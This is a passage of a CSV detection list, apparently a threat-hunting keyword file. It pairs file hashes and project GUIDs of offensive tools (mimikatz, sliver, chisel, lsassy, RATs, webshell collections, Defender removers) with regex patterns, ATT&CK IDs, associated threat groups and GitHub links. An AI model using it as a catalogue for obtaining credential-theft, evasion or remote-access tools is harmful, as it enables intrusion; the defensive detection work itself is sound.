Movement","https://github.com/klezVirus/CheeseTools","1","0","#GUIDproject","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","24645" 
"*36fa3d212c2159c8e1b769bed63fd12c77cdff60f3d13e0b36a554d8e82d6f17*",".{0,1000}36fa3d212c2159c8e1b769bed63fd12c77cdff60f3d13e0b36a554d8e82d6f17.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24646" "*36fc768852cf4e524b223b8cfc3d237b7cada43ad40f23ceb022f232a955616e*",".{0,1000}36fc768852cf4e524b223b8cfc3d237b7cada43ad40f23ceb022f232a955616e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24647" "*36ff05fc406bf6a2e677374028ba00cb622b2219e44c198d5dd6efae4ae963c3*",".{0,1000}36ff05fc406bf6a2e677374028ba00cb622b2219e44c198d5dd6efae4ae963c3.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","24648" "*370058f9f12c7cc257de6508328287c7f6aa566003cecdaf843bdbbc4c0d177d*",".{0,1000}370058f9f12c7cc257de6508328287c7f6aa566003cecdaf843bdbbc4c0d177d.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","24649" "*37029ec9cdb5036dfc1635ce9e69c358f39271bd6300a170e2b61d1d4ac3e526*",".{0,1000}37029ec9cdb5036dfc1635ce9e69c358f39271bd6300a170e2b61d1d4ac3e526.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24650" "*37070edf6ebb0124be0a6c2d8b856ecc73a32149a3b0add1617e2280abbd236e*",".{0,1000}37070edf6ebb0124be0a6c2d8b856ecc73a32149a3b0add1617e2280abbd236e.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24652" 
"*370acf4cc5645e10b1633c5df10fd5331bef377ea731e3c97e05b5538b4266d5*",".{0,1000}370acf4cc5645e10b1633c5df10fd5331bef377ea731e3c97e05b5538b4266d5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24653" "*370cdd5d3a9ee748014a2705e5a82960bef399121fb8f02cd37c47ed5dd7d326*",".{0,1000}370cdd5d3a9ee748014a2705e5a82960bef399121fb8f02cd37c47ed5dd7d326.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24654" "*370d1dcdba848da3c77a39eef3ce5627005f8d762df8e26f8ae6b0bdd16b2323*",".{0,1000}370d1dcdba848da3c77a39eef3ce5627005f8d762df8e26f8ae6b0bdd16b2323.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - 
APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","24655" "*371226668baa95b330676a6268145ad25bfc28f59710f35fc1888aa6b70a74a4*",".{0,1000}371226668baa95b330676a6268145ad25bfc28f59710f35fc1888aa6b70a74a4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24656" "*37124f470cc3c6c54010289c30833614a77f1864f7bf114291c65271f9fc2c4c*",".{0,1000}37124f470cc3c6c54010289c30833614a77f1864f7bf114291c65271f9fc2c4c.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","24657" "*37189960f1e5e6efbc79bf55ef7ee6840cc639ce46905691f89850a950fbdd94*",".{0,1000}37189960f1e5e6efbc79bf55ef7ee6840cc639ce46905691f89850a950fbdd94.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24658" "*37203cc51ff33325e533e58de57884ecb9f28bea3b3e5fda2f0c98d1ce6d61e4*",".{0,1000}37203cc51ff33325e533e58de57884ecb9f28bea3b3e5fda2f0c98d1ce6d61e4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24659" "*372411e7c2512c38573da5590915f7f5bc401d3273e5a6bbbe5c0854d4267458*",".{0,1000}372411e7c2512c38573da5590915f7f5bc401d3273e5a6bbbe5c0854d4267458.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24661" "*3727823313bffb3ba255f6bd4be4239a6b6816ead83aa024cec2459e4ef2cbf1*",".{0,1000}3727823313bffb3ba255f6bd4be4239a6b6816ead83aa024cec2459e4ef2cbf1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24662" "*3727f61b04be843ce0f423136f75180489433da44ad8dc9c948ca0008c7368eb*",".{0,1000}3727f61b04be843ce0f423136f75180489433da44ad8dc9c948ca0008c7368eb.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense 
Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","24663" "*37328d4092b0c2cf9e23443a1575078c0a072e0ca39382e27c8e9c177bad2048*",".{0,1000}37328d4092b0c2cf9e23443a1575078c0a072e0ca39382e27c8e9c177bad2048.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","24665" "*374356feb445591acf371af512a66c6197f8a18613f41988cc7357b27c738a94*",".{0,1000}374356feb445591acf371af512a66c6197f8a18613f41988cc7357b27c738a94.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","24667" "*37447f986ad651df8ea39416f5d5289fda6d3d48155e7ae257c086f9a2478de0*",".{0,1000}37447f986ad651df8ea39416f5d5289fda6d3d48155e7ae257c086f9a2478de0.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","24668" "*374a98a083fc04f30b86718a9fe7a5a61d1afc22b93222a89d2b752b5da1df7e*",".{0,1000}374a98a083fc04f30b86718a9fe7a5a61d1afc22b93222a89d2b752b5da1df7e.{0,1000}","offensive_tool_keyword","GrabChrome","HelloKitty Grabber used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential 
Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24669" "*374cd6159d14dcfe12e51038c9ea6c5e954346963a705f6bd7ab2ce91b37ec61*",".{0,1000}374cd6159d14dcfe12e51038c9ea6c5e954346963a705f6bd7ab2ce91b37ec61.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24670" "*375b4f81c0ce1ab360c6f369c4bb2765ba3d683aae1f33250bdd1d1a79f9d31d*",".{0,1000}375b4f81c0ce1ab360c6f369c4bb2765ba3d683aae1f33250bdd1d1a79f9d31d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24671" "*375D8508-F60D-4E24-9DF6-1E591D2FA474*",".{0,1000}375D8508\-F60D\-4E24\-9DF6\-1E591D2FA474.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","0","#GUIDproject","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","24672" "*375f1c3e957ea3eea4956ae449e652962a57473ff55f193b8eabec033eeea187*",".{0,1000}375f1c3e957ea3eea4956ae449e652962a57473ff55f193b8eabec033eeea187.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential 
Access","https://github.com/runZeroInc/sshamble","1","0","#filehash","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","24673" "*37618f36a162e667eb98cb36bc1568524f87efc7cc12ef6d0ea4ef2f225c799d*",".{0,1000}37618f36a162e667eb98cb36bc1568524f87efc7cc12ef6d0ea4ef2f225c799d.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","#filehash","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","24674" "*376713183026ccc822e9c1dead28cc81c7cfa7ad1c88e368ada6c31ce3909a2e*",".{0,1000}376713183026ccc822e9c1dead28cc81c7cfa7ad1c88e368ada6c31ce3909a2e.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","#filehash","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","24675" "*376890088b7c004896fa764dc8148944e9dcee1017c481e246b892520f96aa6e*",".{0,1000}376890088b7c004896fa764dc8148944e9dcee1017c481e246b892520f96aa6e.{0,1000}","offensive_tool_keyword","GlobalUnProtect","Decrypt GlobalProtect configuration and cookie files.","T1552 - T1003 - T1555","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rotarydrone/GlobalUnProtect","1","0","#filehash","N/A","9","2","147","19","2024-09-10T20:19:24Z","2024-09-04T15:31:52Z","24676" "*3768f75f13bf1f58b77046be2174d666f05006a8a139cdca85bc5cd291a81fa8*",".{0,1000}3768f75f13bf1f58b77046be2174d666f05006a8a139cdca85bc5cd291a81fa8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24677" "*376b60699e97c1214507bfcb1f20f426b2532a94e5594c12ea469454568f2c94*",".{0,1000}376b60699e97c1214507bfcb1f20f426b2532a94e5594c12ea469454568f2c94.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24678" "*37706c5669d241ae392c5b3e412e7a6eefb5397723ea9d464a60c7ae7a8aa2aa*",".{0,1000}37706c5669d241ae392c5b3e412e7a6eefb5397723ea9d464a60c7ae7a8aa2aa.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24680" "*37754362c1524cbecc907a1cde4a3c4e1c747235a140c2275e482724fca9955d*",".{0,1000}37754362c1524cbecc907a1cde4a3c4e1c747235a140c2275e482724fca9955d.{0,1000}","offensive_tool_keyword","lsassy","Extract 
credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","24681" "*3787435B-8352-4BD8-A1C6-E5A1B73921F4*",".{0,1000}3787435B\-8352\-4BD8\-A1C6\-E5A1B73921F4.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24682" "*3787435B-8352-4BD8-A1C6-E5A1B73921F4*",".{0,1000}3787435B\-8352\-4BD8\-A1C6\-E5A1B73921F4.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","#GUIDproject","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","24683" "*378f6e87219651f96e607e40c229e5f17df4ad71836409881fe3cc77c6780ac7*",".{0,1000}378f6e87219651f96e607e40c229e5f17df4ad71836409881fe3cc77c6780ac7.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","#filehash","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","24686" 
"*378FC1AA-37BD-4C61-B5DE-4E45C2CDB8C9*",".{0,1000}378FC1AA\-37BD\-4C61\-B5DE\-4E45C2CDB8C9.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","24687" "*3791fe80848940a320ef55ec49c9a23fffcb1b97977d0a6140df61efc6533829*",".{0,1000}3791fe80848940a320ef55ec49c9a23fffcb1b97977d0a6140df61efc6533829.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#filehash","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","24688" "*379331177374643353a85fea9cd5934f1207a0fc6bb2370b658090240263ccbd*",".{0,1000}379331177374643353a85fea9cd5934f1207a0fc6bb2370b658090240263ccbd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24689" "*379F3514AA07B5A9783639932C3ABF48F68742FE4B65C4A94436632C2AB53AFC*",".{0,1000}379F3514AA07B5A9783639932C3ABF48F68742FE4B65C4A94436632C2AB53AFC.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","24690" "*37a95e2ef3089da0c4c732b45cd9aee36b5a0a0709abf4dd1a739a24f8d08c61*",".{0,1000}37a95e2ef3089da0c4c732b45cd9aee36b5a0a0709abf4dd1a739a24f8d08c61.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","24691" "*37aaa060ddae57e5457ffc47f65362682d64da54775c2211705b8a7becc9e657*",".{0,1000}37aaa060ddae57e5457ffc47f65362682d64da54775c2211705b8a7becc9e657.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","24692" "*37b26d324e903117759d48809761ae6e33bc10e4ce50fb06c4980fd42a4cea8a*",".{0,1000}37b26d324e903117759d48809761ae6e33bc10e4ce50fb06c4980fd42a4cea8a.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for 
Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","24694" "*37bfb3819257d612a6dfed9954c9ba4a8da62f6967ec8221c802d7eb97723113*",".{0,1000}37bfb3819257d612a6dfed9954c9ba4a8da62f6967ec8221c802d7eb97723113.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24697" "*37c719615f3d72d457564a3f2af7669fbea6d651b92de213699419a4e8ac27e9*",".{0,1000}37c719615f3d72d457564a3f2af7669fbea6d651b92de213699419a4e8ac27e9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - 
Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24698" "*37c719615f3d72d457564a3f2af7669fbea6d651b92de213699419a4e8ac27e9*",".{0,1000}37c719615f3d72d457564a3f2af7669fbea6d651b92de213699419a4e8ac27e9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24699" 